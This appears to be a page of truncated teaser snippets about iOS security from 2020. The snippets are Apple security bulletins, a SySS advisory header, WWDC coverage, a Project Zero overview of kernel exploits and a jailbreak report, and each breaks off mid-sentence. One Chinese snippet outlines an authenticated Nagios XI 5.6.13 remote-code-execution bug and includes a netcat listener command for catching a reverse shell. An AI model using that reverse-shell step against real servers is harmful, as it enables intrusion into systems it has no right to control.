Advisory ID: SYSS-2020-011Product: Apple iOSManufacturer: Apple Inc.Affected Version(s): 13.3.1, 13.5.1Tested Version(s): 13.3.1, 13.5.1Vulnerability Type: Exposure of Resource to Wrong Sphere (CWE-668)Risk Level: MediumSolution Status: OpenManufacturer Notification: 2020-03-23Solution Date: -Public Disclosure: 2020-07-02CVE Reference: Not yet assignedAuthor

This week, Apple announced the new features for its coming operating system updates: macOS Big Sur, and iOS 14. They also announced a big change to Mac hardware. Josh and Kirk discuss the changes coming, and take a close look at security and privacy features in these operating systems. Apple’s New Plans for the iPhone, iPad, and Mac Unveiled at WWDC 2020Univ

Even with workers returning to the office—it might be a trickle or a flood depending on the organization—the shift towards remote work is moving from just a short-term necessity to a long-term reality. That shift has changed the face of business worldwide. This change makes it more important than ever for IT and Security teams to prioritize endpoint manageme

In a socially-distanced keynote address to open Apple’s Worldwide Developer Conference yesterday, the company presented new features for the next versions of all of its operating systems. Apple announced new features for macOS, iOS, iPadOS, watchOS, and tvOS, and security and privacy features were prominent across the various operating systems. In this

Posted by Brandon Azad, Project ZeroI recently found myself wishing for a single online reference providing a brief summary of the high-level exploit flow of every public iOS kernel exploit in recent years; since no such document existed, I decided to create it here.This post summarizes original iOS kernel exploits from local app context targeting iOS 10 thr

If you use apps on your iPhone or iPad, other than those included in iOS, you get them from Apple’s App Store. Since Apple’s App Store is the only way to install apps on iOS devices (unlike with macOS where you can obtain apps from the Mac App Store or from developers) you have to use Apple to provide these apps. The App Store has lots of advanta

Batteries are essential to our portable devices. For many of us, in our everyday use of Macs and iOS devices, we don’t have to worry too much about this. Modern iPhones and iPads provide a full day‘s battery life, and if you use a portable Mac, you can probably get through the day unless you are using battery-intensive apps.But sometimes you can’t. If you’re

Digital security and privacy company Avast has issued a warning after it discovered three VPN Apps, available on the Apple App Store, which it claimed are fraudulent and appear to be ‘fleeceware’ – apps that are not ‘malicious’ but do not provide the services they claim to and/or are sold at far higher prices than they should be

iOS and Android apps fail coding best practices, are susceptible to reverse engineering, and share sensitive user data  Executive Summary Top banks and mobile payment providers are putting their customers at risk for security and privacy by failing to adhere to coding best practices and continuing to share sensitive customer data with advertisers. According

-----BEGIN PGP SIGNED MESSAGE-----Hash: SHA256APPLE-SA-2020-06-01-1 iOS 13.5.1 and iPadOS 13.5.1iOS 13.5.1 and iPadOS 13.5.1 are now available and address thefollowing:KernelAvailable for: iPhone 6s and later, iPad Air 2 and later, iPad mini 4and later, and iPod touch 7th generationImpact: An application may be able to execute arbitrary code withkernel privi

There are a lot of things you can do on your iPhone or iPad, and you can quickly access some important settings, even from the lock screen using Control Center. This interface lets you enable, disable, and adjust a number of settings on your iPhone, and even control things like smart home devices or music playback. But there are a number of secret features i

-----BEGIN PGP SIGNED MESSAGE-----Hash: SHA256APPLE-SA-2020-05-26-2 iOS 12.4.7iOS 12.4.7 addresses the following:MailAvailable for: iPhone 5s, iPhone 6, iPhone 6 Plus, iPad Air, iPadmini 2, iPad mini 3, and iPod touch 6th generationImpact: Processing a maliciously crafted mail message may lead tounexpected memory modification or application terminationDescri

-----BEGIN PGP SIGNED MESSAGE-----Hash: SHA256APPLE-SA-2020-05-26-1 iOS 13.5 and iPadOS 13.5iOS 13.5 and iPadOS 13.5 address the following:AccountsAvailable for: iPhone 6s and later, iPad Air 2 and later, iPad mini 4and later, and iPod touch 7th generationImpact: A remote attacker may be able to cause a denial of serviceDescription: A denial of service issue

登陆后的，比较鸡肋。4月份发现的，一直放着，后来看官网更新了，直接发出来吧。另外官方还有一个明显的sql注入没修复。不过也是登陆后，感兴趣的可以去看一下。 简要信息 版本： 5.6.13（5.6.11版本也存在问题，只需要把最后文件名字中的 - 去掉） 条件：登陆后 漏洞文件相关路径：/includes/components/xicore/export-rrd.php、includes/utils-rrdexport.inc.php 漏洞参数：step、start、end 环境 python3 requests库，使用pip3安装即可。python3 -m pip install requests 运行 首先在远程机器上监听端口，用于反弹。命令：nc -l -v -p 4444 python3 nagiox.

byPaul DucklinApple’s latest iOS versions have only been out for a week.The updates are new enough that Apple’s own Security updates page still lists [2020-05-26T14:00Z] the security holes that were fixed in iOS 13.5 and iOS 12.4.7 as “details available soon”.But there’s a jailbreak available already for iOS 13.5, released by th